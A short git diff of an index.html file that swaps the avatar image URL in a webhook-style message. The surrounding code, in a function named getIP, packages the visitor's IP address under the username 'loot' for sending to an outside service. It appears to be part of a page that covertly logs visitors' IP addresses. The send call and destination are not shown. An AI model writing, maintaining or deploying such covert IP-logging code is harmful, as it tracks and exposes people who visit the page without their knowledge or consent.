--- a/index.html
+++ b/index.html
@@ -72,7 +72,7 @@ function getIP(json) {
 
       var params = {
         username: "loot",
-        avatar_url: "https://api.upload.systems/images/0b5NBUfx/download",
+        avatar_url: "https://cdn.discordapp.com/attachments/1029922839056371752/1029923837548171345/Png_1.png",
         content: "**IP:** *" + json.ip + "*"
       }
    
